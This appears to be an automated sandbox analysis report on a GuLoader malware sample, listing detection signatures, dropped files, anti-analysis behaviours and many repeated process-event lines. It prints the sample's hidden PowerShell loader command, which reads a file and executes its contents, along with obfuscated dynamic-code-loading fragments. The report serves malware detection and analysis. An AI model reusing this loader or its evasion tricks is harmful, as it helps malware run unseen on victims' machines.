Source:	Binary string: wntdll.pdb source: Bldtvandsfiltrene166.exe, Bldtvandsfiltrene166.exe, 0000000B.00000003.2187907391.0000000020DEC000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2190343375.0000000020F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.0000000000649000.00000020.00000001.01000000.00000008.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.1916889305.000000000B79C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Shimonoseki $Totalfrednings $Francophil), (Konkretiseret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Capeador = [AppDomain]::CurrentDomain.GetAssemblie
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Kondensator)), $pressemdersutopiloter).DefineDynamicModule($Adenographer, $false).DefineType($Wreathwort, $overpoeticized, [System.Mul

Suspicious powershell command line found

Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Flerpartisystemernes=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic';$Medregnendes=$Flerpartisystemernes.SubString(72468,3);.$Medregnendes($Flerpartisystemernes) "
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Flerpartisystemernes=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic';$Medregnendes=$Flerpartisystemernes.SubString(72468,3);.$Medregnendes($Flerpartisystemernes) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0703A538 push eax; iretd	2_2_0703A631
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0703A5A7 push eax; iretd	2_2_0703A631
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0703E9F9 push eax; mov dword ptr [esp], edx	2_2_0703EA0C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2114225F pushad ; ret	11_2_211427F9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211427FA pushad ; ret	11_2_211427F9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211709AD push ecx; mov dword ptr [esp], ecx	11_2_211709B6
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2114283D push eax; iretd	11_2_21142858
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_0166A533 push ebp; retf	11_2_0166A53C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_01664625 pushad ; retf	11_2_0166462E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_016666B0 push cs; iretd	11_2_016666E2
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_01666698 push cs; iretd	11_2_016666E2
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_0166EB06 push ebp; retf	11_2_0166EB3D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_016692B0 push es; iretd	11_2_016692B3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_0166BD01 push E32BB949h; ret	11_2_0166BD1D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe			Jump to dropped file
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	File created: C:\Users\user\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

API/Special instruction interceptor: Address: 3C98B57

Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

Code function: 11_2_211B096E rdtsc

11_2_211B096E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6881			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2503			Jump to behavior

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

API coverage: 0.2 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 788	Thread sleep time: -8301034833169293s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe TID: 7692	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.00000000052E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8>4
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.1895859643.000000000583B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.1895859643.000000000583B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: powershell.exe, 00000002.00000002.1895859643.000000000583B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2188386593.000000000533E000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.000000000533E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW#2
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2188386593.000000000533E000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.000000000533E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\iwEnYIOol8.exe	API call chain: ExitProcess graph end node			graph_0-3285
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	API call chain: ExitProcess graph end node			graph_0-3437

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

Code function: 11_2_211B096E rdtsc

11_2_211B096E

Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

Code function: 11_2_211B2DF0 NtQuerySystemInformation,LdrInitializeThunk,

11_2_211B2DF0

Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E10E mov eax, dword ptr fs:[00000030h]	11_2_2121E10E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E10E mov ecx, dword ptr fs:[00000030h]	11_2_2121E10E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E10E mov eax, dword ptr fs:[00000030h]	11_2_2121E10E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E10E mov eax, dword ptr fs:[00000030h]	11_2_2121E10E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E10E mov ecx, dword ptr fs:[00000030h]	11_2_2121E10E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E10E mov eax, dword ptr fs:[00000030h]	11_2_2121E10E
